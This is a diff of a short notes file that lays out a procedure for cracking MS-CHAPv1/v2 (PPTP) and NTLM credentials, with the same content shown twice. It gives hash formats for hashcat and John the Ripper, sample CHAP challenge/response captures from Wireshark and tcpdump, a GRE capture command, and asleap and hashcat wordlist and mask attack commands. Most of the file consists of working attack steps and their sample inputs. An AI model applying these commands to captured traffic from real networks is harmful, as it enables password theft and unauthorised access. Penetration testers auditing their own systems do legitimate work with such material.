xardit · May 25, 2016 21:11
diff --git a/mschapv1v2_crack_procedure.txt b/mschapv1v2_crack_procedure.txt


 #hashcat
 NTLMv1:
 Username::Domain:NetLM/ESS-challenge:NTLMv1hash
 Example:
 test::LAB:22CDA4417A1442A500000000000000000000000000000000:C4D2A3981677C4E5BDC7ABFB38E81A247EA6908A41F41610:1122334455667788

 NTLMv2:
 Username::Domain:NTLMv2hash:blob
 Example:
 hashcat::LAB:1122334455667788:3A8471B7657809F73D4F968CB3AFA085:0101000000000000EF38A99DE914CE01EF187701E27D8A2400000000020000000000000000000000

 #JohnRipper
 username::::response:challenge





 # Wireshark 'chap' - note:copy strings as "hex stream"
 222	112.531557000	10.20.21.2	10.20.21.3	PPP CHAP	76	Challenge (NAME='pptpd', VALUE=0x56bca293e3d8614f21fdc4caa761d829)
 226	112.531938000	10.20.21.3	10.20.21.2	PPP CHAP	113	Response (NAME='admin', VALUE=0x3ed6daa5f7a661b498d80959d30e8b0a0000000000000000...)
 227	112.533128000	10.20.21.2	10.20.21.3	PPP CHAP	117	Success (MESSAGE='S=3932B58EC0CC4644B1DDFF1CEE7F8604E56837D1 M=Access granted')

 # TCPDUMP - tcpdump proto gre -w chapdump.cap -i eth0
 00:21:43.693087 IP 10.20.21.2 > 10.20.21.3: GREv1, call 681, seq 3, length 40: CHAP, Challenge (0x01), id 211, Value 351a6be0809cfa29ba26c8023308f3cd, Name pptpd
 00:21:43.693412 IP 10.20.21.3 > 10.20.21.2: GREv1, call 256, seq 5, ack 4, length 77: CHAP, Response (0x02), id 211, Value 98f516e5e62a69285336af58439a212a00000000000000004c791aa993ecaa98f8eb4cb7912753fedcdfd474389e88e900, Name admin
 00:21:43.694070 IP 10.20.21.2 > 10.20.21.3: GREv1, call 681, seq 5, ack 5, length 81: CHAP, Success (0x03), id 211, Msg S=2346AC59EC39F61E77BA4E6AA52E38802DB843A3 M=Access granted


 # only needed
 Challenge 8268c79c48db2edb185893d598076f41
 Response  06659e8b5764ee5f2147d3c869edc365000000000000000084976047d50c8c597931b31a64510166bb4c04ca508db93100

 chap2asleap.py -u usernam -c 32chars -r 98chars

 # wordlist attack
 asleap -C 48:72:66:02:06:00:df:ff -R 4c:79:1a:a9:93:ec:aa:98:f8:eb:4c:b7:91:27:53:fe:dc:df:d4:74:38:9e:88:e9 -W w.list

 # indexed wordlist attack
 genkey -r w.list -f w.dat -n w.idx
 asleap -C 48:72:66:02:06:00:df:ff -R 4c:79:1a:a9:93:ec:aa:98:f8:eb:4c:b7:91:27:53:fe:dc:df:d4:74:38:9e:88:e9 -f w.dat -n w.idx


 Username::Domain:Challenge:NTLMv2hash(aka HMAC-MD5()):blob(entire NTLMv2 response except the HMAC that was in the preceding field)

 Command
 hashcat -a 3 -m 5600 testt.hash ?l?l?l?l


	#hashcat
	NTLMv1:
	Username::Domain:NetLM/ESS-challenge:NTLMv1hash
	Example:
	test::LAB:22CDA4417A1442A500000000000000000000000000000000:C4D2A3981677C4E5BDC7ABFB38E81A247EA6908A41F41610:1122334455667788

	NTLMv2:
	Username::Domain:NTLMv2hash:blob
	Example:
	hashcat::LAB:1122334455667788:3A8471B7657809F73D4F968CB3AFA085:0101000000000000EF38A99DE914CE01EF187701E27D8A2400000000020000000000000000000000

	#JohnRipper
	username::::response:challenge





	# Wireshark 'chap' - note:copy strings as "hex stream"
	222 112.531557000 10.20.21.2 10.20.21.3 PPP CHAP 76 Challenge (NAME='pptpd', VALUE=0x56bca293e3d8614f21fdc4caa761d829)
	226 112.531938000 10.20.21.3 10.20.21.2 PPP CHAP 113 Response (NAME='admin', VALUE=0x3ed6daa5f7a661b498d80959d30e8b0a0000000000000000...)
	227 112.533128000 10.20.21.2 10.20.21.3 PPP CHAP 117 Success (MESSAGE='S=3932B58EC0CC4644B1DDFF1CEE7F8604E56837D1 M=Access granted')

	# TCPDUMP - tcpdump proto gre -w chapdump.cap -i eth0
	00:21:43.693087 IP 10.20.21.2 > 10.20.21.3: GREv1, call 681, seq 3, length 40: CHAP, Challenge (0x01), id 211, Value 351a6be0809cfa29ba26c8023308f3cd, Name pptpd
	00:21:43.693412 IP 10.20.21.3 > 10.20.21.2: GREv1, call 256, seq 5, ack 4, length 77: CHAP, Response (0x02), id 211, Value 98f516e5e62a69285336af58439a212a00000000000000004c791aa993ecaa98f8eb4cb7912753fedcdfd474389e88e900, Name admin
	00:21:43.694070 IP 10.20.21.2 > 10.20.21.3: GREv1, call 681, seq 5, ack 5, length 81: CHAP, Success (0x03), id 211, Msg S=2346AC59EC39F61E77BA4E6AA52E38802DB843A3 M=Access granted


	# only needed
	Challenge 8268c79c48db2edb185893d598076f41
	Response 06659e8b5764ee5f2147d3c869edc365000000000000000084976047d50c8c597931b31a64510166bb4c04ca508db93100

	chap2asleap.py -u usernam -c 32chars -r 98chars

	# wordlist attack
	asleap -C 48:72:66:02:06:00:df:ff -R 4c:79:1a:a9:93:ec:aa:98:f8:eb:4c:b7:91:27:53:fe:dc:df:d4:74:38:9e:88:e9 -W w.list

	# indexed wordlist attack
	genkey -r w.list -f w.dat -n w.idx
	asleap -C 48:72:66:02:06:00:df:ff -R 4c:79:1a:a9:93:ec:aa:98:f8:eb:4c:b7:91:27:53:fe:dc:df:d4:74:38:9e:88:e9 -f w.dat -n w.idx


	Username::Domain:Challenge:NTLMv2hash(aka HMAC-MD5()):blob(entire NTLMv2 response except the HMAC that was in the preceding field)

	Command
	hashcat -a 3 -m 5600 testt.hash ?l?l?l?l